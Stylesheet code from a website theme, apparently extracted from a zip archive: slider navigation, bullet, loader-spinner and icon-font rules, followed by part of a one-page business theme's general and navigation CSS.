.tp-bullets.preview3 .bullet 				{	cursor: pointer;
											    position: relative !important;
											    background: rgba(0, 0, 0, 0.5) !important;
											    -webkit-border-radius: 10px;
											    border-radius: 10px;
											    -webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
											    width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 0) !important;
											    display: inline-block;
											    margin-right: 2px !important;
											    margin-bottom: 0px !important;
											    -webkit-transition: background-color 0.2s, border-color 0.2s;
											    -moz-transition: background-color 0.2s, border-color 0.2s;
											    -o-transition: background-color 0.2s, border-color 0.2s;
											    -ms-transition: background-color 0.2s, border-color 0.2s;
											    transition: background-color 0.2s, border-color 0.2s;
											    float:none !important;
											    box-sizing:content-box;
												-moz-box-sizing:content-box;
												-webkit-box-sizing:content-box;
}
.tp-bullets.preview3 .bullet.last 			{	margin-right: 0px}
.tp-bullets.preview3 .bullet:hover,
.tp-bullets.preview3 .bullet.selected 		{	-webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
												background: rgba(255, 255, 255, 1) !important;
												width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 1) !important;
}


	@media only screen and (min-width: 768px) and (max-width: 979px) {
		.tparrows.preview3:after,
		.tparrows.preview3 							{	width:50px; height:50px; line-height:50px;font-size:20px}
		.tparrows.preview3 .tp-arr-iwrapper			{	min-height:70px}
		.tparrows.preview3 .tp-arr-imgholder 		{	min-width:70px;height:70px}
		.tp-rightarrow.preview3 .tp-arr-iwrapper	{	padding-right:50px}
		.tp-leftarrow.preview3 .tp-arr-iwrapper		{	padding-left:50px}
		.tparrows.preview3 .tp-arr-titleholder		{	padding:10px;font-size:16px}



	}

    @media only screen  and (max-width: 767px) {

		.tparrows.preview3:after,
		.tparrows.preview3 							{	width:50px; height:50px; line-height:50px;font-size:20px}
		.tparrows.preview3 .tp-arr-iwrapper			{	min-height:70px}
	}





/* NAVIGATION PREVIEW 4 */
.tparrows.preview4 							{	width:30px; height:110px;  background:transparent;-webkit-transform-style: preserve-3d; -webkit-perspective: 1000; -moz-perspective: 1000}
.tparrows.preview4:after					{	position:absolute;  line-height: 110px;text-align: center; font-family: "revicons"; color:#fff; font-size:20px; top:0px;left:0px;z-index:0; width:30px;height:110px; background: #000; background: rgba(0,0,0,0.25);
												-webkit-transition: all 0.2s ease-in-out;
											    -moz-transition: all 0.2s ease-in-out;
											    -o-transition: all 0.2s ease-in-out;
											    transition: all 0.2s ease-in-out;
												   -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";filter: alpha(opacity=100);-moz-opacity: 1;-khtml-opacity: 1;opacity: 1;

											}

.tp-rightarrow.preview4:after				{	content: '\e825';  }
.tp-leftarrow.preview4:after				{	content: '\e824';  }


.tparrows.preview4 .tp-arr-allwrapper		{	visibility:hidden;width:180px;position: absolute;z-index: 1;min-height:120px;top:0px;left:-150px; overflow: hidden;-webkit-perspective: 1000px;-webkit-transform-style: flat}

.tp-leftarrow.preview4 .tp-arr-allwrapper	{	left:0px}
.tparrows.preview4 .tp-arr-iwrapper			{	position: relative}

.tparrows.preview4 .tp-arr-imgholder 		{	display:block;background-size:cover; background-position:center center;width:180px;height:110px;
												position:relative;top:0px;

												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;



											}


.tparrows.preview4 .tp-arr-imgholder2 		{	display:block;background-size:cover; background-position:center center; width:180px;height:110px;
												position:absolute;top:0px; left:180px;
												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;

											}

.tp-leftarrow.preview4 .tp-arr-imgholder2 	{	left:-180px}




.tparrows.preview4 .tp-arr-titleholder		{	display:block; font-size:12px; line-height:25px; padding:0px 10px;text-align:left;color:#fff; position: relative;
												background: #000;
												color: #FFF;
												text-transform: uppercase;
												white-space: nowrap;
												letter-spacing: 1px;
												font-weight: 700;
												font-size: 11px;
												line-height: 2.75;
												-webkit-transition: all 0.3s;
												transition: all 0.3s;
												-webkit-transform: rotateX(-90deg);
												transform: rotateX(-90deg);
												-webkit-transform-origin: 50% 0;
												transform-origin: 50% 0;
												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;
												  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";filter: alpha(opacity=0);-moz-opacity: 0.0;-khtml-opacity: 0.0;opacity: 0.0;


}



.tparrows.preview4:after				{	transform-origin: 100% 100%; -webkit-transform-origin: 100% 100%}
.tp-leftarrow.preview4:after			{	transform-origin: 0% 0%; -webkit-transform-origin: 0% 0%}




@media only screen and (min-width: 768px)  {
		.tparrows.preview4:hover:after				{	-webkit-transform: rotateY(-90deg); transform:rotateY(-90deg)}
		.tp-leftarrow.preview4:hover:after			{	-webkit-transform: rotateY(90deg); transform:rotateY(90deg)}


		.tparrows.preview4:hover .tp-arr-titleholder	{	-webkit-transition-delay: 0.4s;
															transition-delay: 0.4s;
															-webkit-transform: rotateX(0deg);
															transform: rotateX(0deg);
															-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";filter: alpha(opacity=100);-moz-opacity: 1;-khtml-opacity: 1;opacity: 1;

														}
}

/* PREVIEW 4 BULLETS */

.tp-bullets.preview4 						{ 	height: 17px}
.tp-bullets.preview4 .bullet 				{	cursor: pointer;
											    position: relative !important;
											    background: rgba(0, 0, 0, 0.5) !important;
											    -webkit-border-radius: 10px;
											    border-radius: 10px;
											    -webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
											    width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 0) !important;
											    display: inline-block;
											    margin-right: 2px !important;
											    margin-bottom: 0px !important;
											    -webkit-transition: background-color 0.2s, border-color 0.2s;
											    -moz-transition: background-color 0.2s, border-color 0.2s;
											    -o-transition: background-color 0.2s, border-color 0.2s;
											    -ms-transition: background-color 0.2s, border-color 0.2s;
											    transition: background-color 0.2s, border-color 0.2s;
											    float:none !important;
											    box-sizing:content-box;
												-moz-box-sizing:content-box;
												-webkit-box-sizing:content-box;
}
.tp-bullets.preview4 .bullet.last 			{	margin-right: 0px}
.tp-bullets.preview4 .bullet:hover,
.tp-bullets.preview4 .bullet.selected 		{	-webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
												background: rgba(255, 255, 255, 1) !important;
												width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 1) !important;
}


    @media only screen  and (max-width: 767px) {
   		 .tparrows.preview4 						{	width:20px; height:80px}
   		 .tparrows.preview4:after					{	width:20px; height:80px; line-height:80px; font-size:14px}

   		 .tparrows.preview1 .tp-arr-allwrapper,
   		 .tparrows.preview2 .tp-arr-allwrapper,
   		 .tparrows.preview3 .tp-arr-allwrapper,
   		 .tparrows.preview4 .tp-arr-allwrapper		{	display: none !important}
    }



/******************************
	-	LOADER FORMS	-
********************************/

.tp-loader 	{
				top:50%; left:50%;
				z-index:10000;
				position:absolute;


			}

.tp-loader.spinner0 {
  width: 40px;
  height: 40px;
  /*background:url(../assets/loader.gif) no-repeat center center;*/
  background-color: #fff;
  box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  margin-top:-20px;
  margin-left:-20px;
  -webkit-animation: tp-rotateplane 1.2s infinite ease-in-out;
  animation: tp-rotateplane 1.2s infinite ease-in-out;
  border-radius: 3px;
	-moz-border-radius: 3px;
	-webkit-border-radius: 3px;
}


.tp-loader.spinner1 {
  width: 40px;
  height: 40px;
  background-color: #fff;
  box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  margin-top:-20px;
  margin-left:-20px;
  -webkit-animation: tp-rotateplane 1.2s infinite ease-in-out;
  animation: tp-rotateplane 1.2s infinite ease-in-out;
  border-radius: 3px;
	-moz-border-radius: 3px;
	-webkit-border-radius: 3px;
}



.tp-loader.spinner5 	{	background:url(../assets/loader.gif) no-repeat 10px 10px;
							background-color:#fff;
							margin:-22px -22px;
							width:44px;height:44px;
							border-radius: 3px;
							-moz-border-radius: 3px;
							-webkit-border-radius: 3px;
						}


@-webkit-keyframes tp-rotateplane {
  0% { -webkit-transform: perspective(120px) }
  50% { -webkit-transform: perspective(120px) rotateY(180deg) }
  100% { -webkit-transform: perspective(120px) rotateY(180deg)  rotateX(180deg) }
}

@keyframes tp-rotateplane {
  0% {
    transform: perspective(120px) rotateX(0deg) rotateY(0deg);
    -webkit-transform: perspective(120px) rotateX(0deg) rotateY(0deg)
  } 50% {
    transform: perspective(120px) rotateX(-180.1deg) rotateY(0deg);
    -webkit-transform: perspective(120px) rotateX(-180.1deg) rotateY(0deg)
  } 100% {
    transform: perspective(120px) rotateX(-180deg) rotateY(-179.9deg);
    -webkit-transform: perspective(120px) rotateX(-180deg) rotateY(-179.9deg);
  }
}


.tp-loader.spinner2 {
  width: 40px;
  height: 40px;
  margin-top:-20px;margin-left:-20px;
  background-color: #ff0000;
   box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  border-radius: 100%;
  -webkit-animation: tp-scaleout 1.0s infinite ease-in-out;
  animation: tp-scaleout 1.0s infinite ease-in-out;
}

@-webkit-keyframes tp-scaleout {
  0% { -webkit-transform: scale(0.0) }
  100% {
    -webkit-transform: scale(1.0);
    opacity: 0;
  }
}

@keyframes tp-scaleout {
  0% {
    transform: scale(0.0);
    -webkit-transform: scale(0.0);
  } 100% {
    transform: scale(1.0);
    -webkit-transform: scale(1.0);
    opacity: 0;
  }
}




.tp-loader.spinner3 {
  margin: -9px 0px 0px -35px;
  width: 70px;
  text-align: center;

}

.tp-loader.spinner3 .bounce1,
.tp-loader.spinner3 .bounce2,
.tp-loader.spinner3 .bounce3 {
  width: 18px;
  height: 18px;
  background-color: #fff;
  box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  border-radius: 100%;
  display: inline-block;
  -webkit-animation: tp-bouncedelay 1.4s infinite ease-in-out;
  animation: tp-bouncedelay 1.4s infinite ease-in-out;
  /* Prevent first frame from flickering when animation starts */
  -webkit-animation-fill-mode: both;
  animation-fill-mode: both;
}

.tp-loader.spinner3 .bounce1 {
  -webkit-animation-delay: -0.32s;
  animation-delay: -0.32s;
}

.tp-loader.spinner3 .bounce2 {
  -webkit-animation-delay: -0.16s;
  animation-delay: -0.16s;
}

@-webkit-keyframes tp-bouncedelay {
  0%, 80%, 100% { -webkit-transform: scale(0.0) }
  40% { -webkit-transform: scale(1.0) }
}

@keyframes tp-bouncedelay {
  0%, 80%, 100% {
    transform: scale(0.0);
    -webkit-transform: scale(0.0);
  } 40% {
    transform: scale(1.0);
    -webkit-transform: scale(1.0);
  }
}




.tp-loader.spinner4 {
  margin: -20px 0px 0px -20px;
  width: 40px;
  height: 40px;
  text-align: center;
  -webkit-animation: tp-rotate 2.0s infinite linear;
  animation: tp-rotate 2.0s infinite linear;
}

.tp-loader.spinner4 .dot1,
.tp-loader.spinner4 .dot2 {
  width: 60%;
  height: 60%;
  display: inline-block;
  position: absolute;
  top: 0;
  background-color: #fff;
  border-radius: 100%;
  -webkit-animation: tp-bounce 2.0s infinite ease-in-out;
  animation: tp-bounce 2.0s infinite ease-in-out;
  box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
}

.tp-loader.spinner4 .dot2 {
  top: auto;
  bottom: 0px;
  -webkit-animation-delay: -1.0s;
  animation-delay: -1.0s;
}

@-webkit-keyframes tp-rotate { 100% { -webkit-transform: rotate(360deg) }}
@keyframes tp-rotate { 100% { transform: rotate(360deg); -webkit-transform: rotate(360deg) }}

@-webkit-keyframes tp-bounce {
  0%, 100% { -webkit-transform: scale(0.0) }
  50% { -webkit-transform: scale(1.0) }
}

@keyframes tp-bounce {
  0%, 100% {
    transform: scale(0.0);
    -webkit-transform: scale(0.0);
  } 50% {
    transform: scale(1.0);
    -webkit-transform: scale(1.0);
  }
}



.tp-transparentimg {	content:"url(../assets/transparent.png)"}
.tp-3d				{	-webkit-transform-style: preserve-3d;
						 -webkit-transform-origin: 50% 50%;
					}



.tp-caption img {
background: transparent;
-ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#00FFFFFF,endColorstr=#00FFFFFF)";
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#00FFFFFF,endColorstr=#00FFFFFF);
zoom: 1;
}


@font-face {
  font-family: 'revicons';
  src: url('../font/revicons.eot?5510888');
  src: url('../font/revicons.eot?5510888#iefix') format('embedded-opentype'),
       url('../font/revicons.woff?5510888') format('woff'),
       url('../font/revicons.ttf?5510888') format('truetype'),
       url('../font/revicons.svg?5510888#revicons') format('svg');
  font-weight: normal;
  font-style: normal;
}
/* Chrome hack: SVG is rendered more smooth in Windozze. 100% magic, uncomment if you need it. */
/* Note, that will break hinting! In other OS-es font will be not as sharp as it could be */
/*
@media screen and (-webkit-min-device-pixel-ratio:0) {
  @font-face {
    font-family: 'revicons';
    src: url('../font/revicons.svg?5510888#revicons') format('svg');
  }
}
*/

 [class^="revicon-"]:before, [class*=" revicon-"]:before {
  font-family: "revicons";
  font-style: normal;
  font-weight: normal;
  speak: none;

  display: inline-block;
  text-decoration: inherit;
  width: 1em;
  margin-right: .2em;
  text-align: center;
  /* opacity: .8; */

  /* For safety - reset parent styles, that can break glyph codes*/
  font-variant: normal;
  text-transform: none;

  /* fix buttons height, for twitter bootstrap */
  line-height: 1em;

  /* Animation center compensation - margins should be symmetric */
  /* remove if not needed */
  margin-left: .2em;

  /* you can be more comfortable with increased icons size */
  /* font-size: 120%; */

  /* Uncomment for 3D effect */
  /* text-shadow: 1px 1px 1px rgba(127, 127, 127, 0.3); */
}

.revicon-search-1:before { content: '\e802'} /* '' */
.revicon-pencil-1:before { content: '\e831'} /* '' */
.revicon-picture-1:before { content: '\e803'} /* '' */
.revicon-cancel:before { content: '\e80a'} /* '' */
.revicon-info-circled:before { content: '\e80f'} /* '' */
.revicon-trash:before { content: '\e801'} /* '' */
.revicon-left-dir:before { content: '\e817'} /* '' */
.revicon-right-dir:before { content: '\e818'} /* '' */
.revicon-down-open:before { content: '\e83b'} /* '' */
.revicon-left-open:before { content: '\e819'} /* '' */
.revicon-right-open:before { content: '\e81a'} /* '' */
.revicon-angle-left:before { content: '\e820'} /* '' */
.revicon-angle-right:before { content: '\e81d'} /* '' */
.revicon-left-big:before { content: '\e81f'} /* '' */
.revicon-right-big:before { content: '\e81e'} /* '' */
.revicon-magic:before { content: '\e807'} /* '' */
.revicon-picture:before { content: '\e800'} /* '' */
.revicon-export:before { content: '\e80b'} /* '' */
.revicon-cog:before { content: '\e832'} /* '' */
.revicon-login:before { content: '\e833'} /* '' */
.revicon-logout:before { content: '\e834'} /* '' */
.revicon-video:before { content: '\e805'} /* '' */
.revicon-arrow-combo:before { content: '\e827'} /* '' */
.revicon-left-open-1:before { content: '\e82a'} /* '' */
.revicon-right-open-1:before { content: '\e82b'} /* '' */
.revicon-left-open-mini:before { content: '\e822'} /* '' */
.revicon-right-open-mini:before { content: '\e823'} /* '' */
.revicon-left-open-big:before { content: '\e824'} /* '' */
.revicon-right-open-big:before { content: '\e825'} /* '' */
.revicon-left:before { content: '\e836'} /* '' */
.revicon-right:before { content: '\e826'} /* '' */
.revicon-ccw:before { content: '\e808'} /* '' */
.revicon-arrows-ccw:before { content: '\e806'} /* '' */
.revicon-palette:before { content: '\e829'} /* '' */
.revicon-list-add:before { content: '\e80c'} /* '' */
.revicon-doc:before { content: '\e809'} /* '' */
.revicon-left-open-outline:before { content: '\e82e'} /* '' */
.revicon-left-open-2:before { content: '\e82c'} /* '' */
.revicon-right-open-outline:before { content: '\e82f'} /* '' */
.revicon-right-open-2:before { content: '\e82d'} /* '' */
.revicon-equalizer:before { content: '\e83a'} /* '' */
.revicon-layers-alt:before { content: '\e804'} /* '' */
.revicon-popup:before { content: '\e828'} /* '' */

	h2.tp-caption-1,
  	h2.tp-caption{
  
		font-family: "raleway";
		text-transform:none;
		font-weight: 300;
		/*font-size: 60px !important;
	  	line-height:70px!important;
	  	margin-bottom:100px!important;*/
  	}
  	p.tp-caption-1,
  	p.tp-caption{
		font-family: "raleway";
		text-transform:none;
		font-weight: 300;
		/*font-size: 30px !important;
	  	line-height:24px!important;
	  	letter-spacing:2px;*/
  	}PK!��
����bizone/css/onepage_old.cssnu&1i� @charset "utf-8";
/* CSS Document 

Table Of Content

+General Styling and Tags
*body
+ @font-face

+ Header

+ #main-navigation
-.navigation
	- .navbar-nav
		- .page-scroll

+- #main-slider

+ #about
	-.canvas-box

+ #bg-paralax

+ #facts
	-.number-counters
		-.counters-item 
		
+ #responsive
	-.responsive-pic
	-.r-test
		-.r-feature
			-.screens

+ #experties
	-.myStat2
	-.circliful
		-.circle-text
			-canvas

+ .we-do
	-.do-wrap

+ #thinkers
	-.thinker-wrap
		-.social-contact
	
+ #project
   - .work-filter 
	- .work-item
		- .overlay
			- .overlay-inner


+ #pricing
	-.pricing 
	-.pricing_tenzin
		-.pricing_item 
			-.pricing_title
			-.pricing_price
			-.pricing_sentence
			-.pricing_list
			-.pricing_action

			
+ #testinomial
	-#testinomial-slider
	-.owl-carousel
		.item

+ #publication
	-#publication-slider
	-.owl-carousel
		.item
		
+ #contact
	-#letstalk

+ ##area-main
	-.blog-wrap
		-.blog-content
			-.blog-item
		

+ footer
	-.breadcrumb

*/






/****** General Styling ******/
body{
	 color:#222222;
    font-family: "Open Sans", sans-serif;
	 overflow-x: hidden;
	 font-size:14px;
	 
}
ul , ol{
	margin:0;
	padding:0;
	list-style:none;
}
a ,
a:hover , 
a:focus{
	text-decoration:none;
	outline:none;
	color:inherit;
}
input[type="submit"]{
	background-color:transparent;
}	
button:focus {
    outline: medium none;
}
h1,
h2, 
h3, 
h4, 
#testinomial-slider .item h5{
	margin:0;
}
h1{
	font-size:46px;
}
h2, 
h3,
h4{
	text-transform:capitalize;
	font-family: "raleway";
}

h2{
	font-size:44px;
}
h3{
	font-size:24px;
	font-weight: 600;
}

h4{
	font-size:18px;
	text-transform: capitalize;
    font-weight: 600;
}
p{
	font-size:14px;
	color:#222222;
}
textarea{
	resize:none;
}
p.title{
	font-size:14px;
	text-transform:capitalize;
}
.heading{
	margin-bottom:40px;
}
.padding{
	padding:90px 0;
}
.top-padding{
	padding-top:90px;
}
.bottom-padding{
	padding-bottom: 90px;
}
.box-section.nopadding .bt-boxfluid,
.container-fluid.nopadding{
	padding-left: 0;
	padding-right: 0;
}
.section-padding{
	padding-top:130px!important;
}
#about.section-padding{
	padding-top:170px!important;	
}
.padding-botom{
	padding-bottom:90px;
}
.magin30{
	margin-bottom:30px;
}
.dark{
	background:#1b1d1f;
}
.light{
	background:#f5f5f5;
}
.base_color{
	background:#82b440;
}

.green{
	background:#74c8b8;
}

.pink{
	background:#ec768c;
}

.purple{
	background:#c183d6;
}

.blue{
	background:#31aae1;
}

.green-text{
	color:#74c8b8;
}
.pink-text{
	color:#ec768c;
}
.purple-text{
	color:#c183d6;
}

.blue-text{
	color:#31aae1;
}

.bg-grey{
	background:#ececec;
}

/*Buttons*/
.btn-common{
	border:1px solid #fff;
	color:#fff;
}

.btn-black{
	border:1px solid #000;
	color:#000;
}
.btn-green{
	background:#82B440;
	border:1px solid transparent;
}	
.btn-blue{
	background:#07AAA5;
	border:1px solid transparent;
}
.btn-pink{
	background:#ec768c;
	border:1px solid transparent;
}
.btn-common,
.btn-black,
.btn-white,
.loadmore{
	font-size:15px;
	font-weight:bold;
	text-transform:capitalize;
	display:inline-block;
	padding:12px 30px;
}
.btn-white{
	background:#fff;
	color:#000;
	border:1px solid transparent;
}
a.readmore{
	font-size:13px;
	font-weight:bold;
	text-decoration:underline;
	display:inline-block;
	text-transform:uppercase;
}
a.readmore:hover, a.readmore:focus{
	color:#82b440;
}
.loadmore{
	color:#222222;
	margin-top:40px;
	position:relative;
	-webkit-transition: color 0.3s ease 0s;
	-ms-transition: color 0.3s ease 0s;
	-o-transition: color 0.3s ease 0s;
	transition: color 0.3s ease 0s;
}
.loadmore:hover{
	color:#82b440;
}
.loadmore::before {
  color: transparent;
  content: "•";
  font-size: 1.2em;
  left:95%;
  pointer-events: none;
  position: absolute;
  text-shadow: 0 0 transparent;
  top:25%;
  transform: translateX(-50%);
  transition: text-shadow 0.3s ease 0s, color 0.3s ease 0s;
}
.loadmore:hover::before, .loadmore:focus::before {
  color: #82b440;
  text-shadow: 10px 0 #82b440, -10px 0 #82b440;
}

/* Bounce To Top */
.bounce-top,
.bounce-green,
.bounce-white, 
.bounce-pink{
  display: inline-block;
  vertical-align: middle;
  -webkit-transform: translateZ(0);
  transform: translateZ(0);
  box-shadow: 0 0 1px rgba(0, 0, 0, 0);
  -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
  -moz-osx-font-smoothing: grayscale;
  position: relative;
  -webkit-transition-property: color;
  transition-property: color;
  -webkit-transition-duration: 0.5s;
  transition-duration: 0.5s;
}
.bounce-pink:before{
	background:#EC768C !important;
}
.bounce-top:before{
	background: #07AAA5;
	
}
.bounce-green:before{
	background:#82B440;
}
.bounce-white:before{
	background: #fff;
}	
.bounce-top:before,
.bounce-green:before,
.bounce-white:before,
.bounce-pink:before{
  content: "";
  position: absolute;
  z-index: -1;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  -webkit-transform: scaleY(0);
  transform: scaleY(0);
  -webkit-transform-origin: 50% 100%;
  transform-origin: 50% 100%;
  -webkit-transition-property: transform;
  transition-property: transform;
  -webkit-transition-duration: 0.5s;
  transition-duration: 0.5s;
  -webkit-transition-timing-function: ease-out;
  transition-timing-function: ease-out;
}
.bounce-top:hover, .bounce-top:focus{
   color: #fff!important;
   border:1px solid #07AAA5;
}
.bounce-pink:hover, .bounce-pink:focus{
   color: #fff !important;
   border:1px solid #EC768C !important;
}
.bounce-green:hover, .bounce-green:focus{
   color: #fff;
   border:1px solid #82B440;
}
.bounce-white:hover, .bounce-white:focus{
	color:#1b1d1f !important;
	border:1px solid #fff;
}	
.bounce-top:hover:before, .bounce-top:focus:before, 
.bounce-green:hover::before, .bounce-green:focus::before,
.bounce-white:hover::before, .bounce-white:focus::before,
.bounce-pink:hover::before, .bounce-pink:focus::before{
  -webkit-transform: scaleY(1);
  transform: scaleY(1);
  -webkit-transition-timing-function: cubic-bezier(0.52, 1.64, 0.37, 0.66);
  transition-timing-function: cubic-bezier(0.52, 1.64, 0.37, 0.66);
}


/*Section with image*/
.info-section {
	overflow:hidden;
}
.info-section .row {
    margin: 0;
}

.info-section .block {
    position: relative;
}
.info-section ul.social-media{
}

.info-section ul.social-media li{
	display:inline-block;
}

.info-section ul.social-media li a{
	color:#1b1d1f;
	font-size:20px;
	margin-right:10px;
	display:block;
	margin-top:25px;
}
.info-section ul.social-media li a:hover,.info-section ul.social-media li a:focus{
	color:#82b440
}

.info-section .bg {
    background-size: cover;
	 background-position: center center;
    bottom: 0;
    left: 0;
    position:relative;
    right: 0;
    top: 0;
	 padding-top:75%;
	 margin:0 -15px;
}

.info-section .block {
	padding-top:0;
	padding:90px 5%;
}
.info-section .block .center {
  height:100%;
}


/*Header Starts*/
a, #navigation.affix .navbar-default .navbar-nav > li > a,
#main-navigation, #navigation.affix, .navbar-brand,
#navigation.affix .navbar-default .navbar-nav > li > a,
.push_nav li a,
ul.top-right li a:hover,
#about .canvas-box span i, #about .canvas-box h4,
#about .canvas-box:hover span i,
.we-do .do-wrap i, .we-do .do-wrap:hover i,
.counters-item i, .counters-item:hover i,
.thinker-image .overlay,
.work-filter ul li a,
.main-button, .main-button > button span, .overlay,
.we-do .do-wrap:hover .top, .we-do .do-wrap:hover span,
#paralax-slider .owl-controls .owl-page span{
	-webkit-transition: all .3s ease;
   -moz-transition: all .3s ease;
	-ms-transition: all .3s ease;
   -o-transition:all .3s ease;
	transition:all .3s ease;
}	
#main-navigation {
  position: absolute;
 
}
#navigation.affix {
  background-color: #fff;
  position: fixed;
  -webkit-box-shadow:0 2px 10px -1px rgba(87, 97, 100, 0.35);
  -moz-box-shadow:0 2px 10px -1px rgba(87, 97, 100, 0.35);
   box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);

}
#main-navigation, #navigation.affix{
	top: 0;
	z-index:999;
	width: 100%;

}	
.navbar-default {
  background-color: transparent;
  border-color: transparent;
}
.navbar , .navbar-default{
	  border:none;
}
.navbar {
  margin-bottom: 0;
  min-height: auto;
}
 .navbar-collapse {
   overflow-x: visible !important;
}
.navbar-collapse.in {
  overflow-y: auto !important;
  height: auto !important;
}
.navbar-brand {
  height: auto;
  padding:29px 0;
  float:none;
  display:block;
  width:150px;
}
#navigation.affix .navbar-brand {
  padding: 16px 0;
  width: 134px;
}
.navbar-default .navbar-nav > li{
	 margin:0 20px;
}
.navbar-default .navbar-nav > li > a {
  color: #fff;
  font-size:12px;
  font-weight:600;
  letter-spacing:1px;
  text-transform:uppercase;
  padding:37px 0 15px 0;
  border-bottom:3px solid transparent;
}
#navigation.affix .navbar-default .navbar-nav > li > a{
	color: #222;
	padding:22px 0;
		
}
.navbar-default .navbar-nav > li > a:hover,
#navigation.affix .navbar-default .navbar-nav > li > a:hover{
	color:#07AAA5;
	background-color:transparent;
}
.navbar-default .navbar-nav > .active a, .navbar-default .navbar-nav > .active a:hover,
.navbar-default .navbar-nav > .active a:focus,
#navigation.affix .navbar-default .navbar-nav > .active a, #navigation.affix .navbar-default .navbar-nav > .active a:hover,
#navigation.affix .navbar-default .navbar-nav > .active a:focus{
	color:#07AAA5;
	border-bottom:3px solid #82b440;
	background-color:transparent;
}	

.navbar-toggle {
  background: transparent !important;
  border: medium none;
  margin-right: 0;
}

.navbar-toggle:hover {
  background: transparent !important;
}
.navbar-toggle .icon-bar {
  width: 22px;
  -webkit-transition: all 0.2s;
  -ms-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
  background-color:#fff !important;
}
#navigation.affix .navbar-toggle .icon-bar{
	background-color:#222 !important;
}	
.navbar-toggle .top-bar {
  transform: rotate(45deg);
  transform-origin: 10% 10%;
}
.navbar-toggle .middle-bar {
  opacity: 0;
  filter: alpha(opacity=0);
}
.navbar-toggle .bottom-bar {
  transform: rotate(-45deg);
  transform-origin: 10% 90%;
}
.navbar-toggle.collapsed .top-bar {
  transform: rotate(0);
}
.navbar-toggle.collapsed .middle-bar {
  opacity: 1;
  filter: alpha(opacity=100);
}
.navbar-toggle.collapsed .bottom-bar {
  transform: rotate(0);
}
/*Social Icons On Headers*/
ul.top-right {
  float: right;
  width: auto;
  margin: 34px 0 34px 10px;
  position:relative;
  z-index:1000;
}
#navigation.affix ul.top-right{
	margin:17px 0 17px 10px;
}
ul.top-right li{
	display:inline-block;
	margin-left:2px;
}
ul.top-right li a {
  display: block;
  font-size:13px;
  -webkit-border-radius:50%;
  border-radius:50%;
  height:26px;
  width:26px;
  text-align: center;
  line-height:26px;
  color:#fff;
}
#navigation.affix  ul.top-right li a {
  color: #222;
}
#navigation.affix  ul.top-right li a:hover{
	color:#fff;
}
ul.top-right li a:hover{
	background:#fff;
}
ul.top-right li a:hover.facebook{
	  color:#3b5998;
}
ul.top-right li a:hover.twitter{
	color:#55acee;
}
ul.top-right li a:hover.instagram{
	color:#e95950;
}

#navigation.affix ul.top-right li a:hover.facebook{
	  background:#3b5998;
}
#navigation.affix ul.top-right li a:hover.twitter{
	background:#55acee;
}
#navigation.affix ul.top-right li a:hover.instagram{
	background:#e95950;
}


/* ------------- Push Menu ------------ */
#main-navigation.noborder {
  box-shadow: 0 0;
}	
.main-button {
  height: auto;
  position: fixed;
  width:auto;
  z-index: 999;
  top: 31px;
}
.main-button.right{
	right: 15px;
}
.main-button.left{
	left: 15px;
}
.main-button.left > button.menu-active{
	left:250px;
}
.main-button > button {
  background-color:#fff;
  border:none;
  padding:5px;
  -webkit-border-radius:2px;
  -ms--border-radius:2px;
  border-radius:2px;
}
.main-button > button:hover span:first-child,
.main-button > button.menu-active span:first-child{
  transform: translateY(6px) rotate(-45deg);
}

.main-button > button:hover span:nth-child(2),
.main-button > button.menu-active span:nth-child(2){
  opacity: 0;
  transform: rotate(-45deg);
}
.main-button > button:hover span:last-child,
.main-button > button.menu-active span:last-child{
  transform: translateY(-6px) rotate(-135deg);
}
.main-button > button span {
  background: #000 none repeat scroll 0 0;
  display: block;
  height: 3px;
  pointer-events: none;
  transform-style: flat !important;
  width:20px;
}.main-button > button span:nth-child(2){
  margin: 3px 0;
}
.navbar-brand {
  display: inline-block;
}
.cbp-spmenu {
    background:#fff;
    position: fixed;
	 box-shadow:0px 0px 8px 1px rgba(0,0,0,0.176);
}
.push_nav_brand{
	margin:30px 0 30px 15px;
	display: inline-block;
	width:110px;
}
.logo-space{ padding:32px 0;}
.push_nav li{
	position:relative;
	overflow: hidden;
}
.push_nav li a{
  border-bottom: 2px solid #f5f5f5;
  color: #000;
  font-size:13px;
  font-weight:600;
  display:block;
  padding:15px;
  position:relative;
  text-transform: capitalize;
  letter-spacing:1px; 
  font-family: "raleway";
}
.push_nav li a:hover, .push_nav li.active a, .push_nav .active a:hover, .push_nav li.active a:focus{
	color:#07AAA5;
}	
/* ------------- Push Menu ------------ */



/* Index5 Navigation */
.index5 .affix-top{
	top: 0;
    z-index: 999;
    width: 100%;
	background-color: #fff;
    position: fixed;
    -webkit-box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);
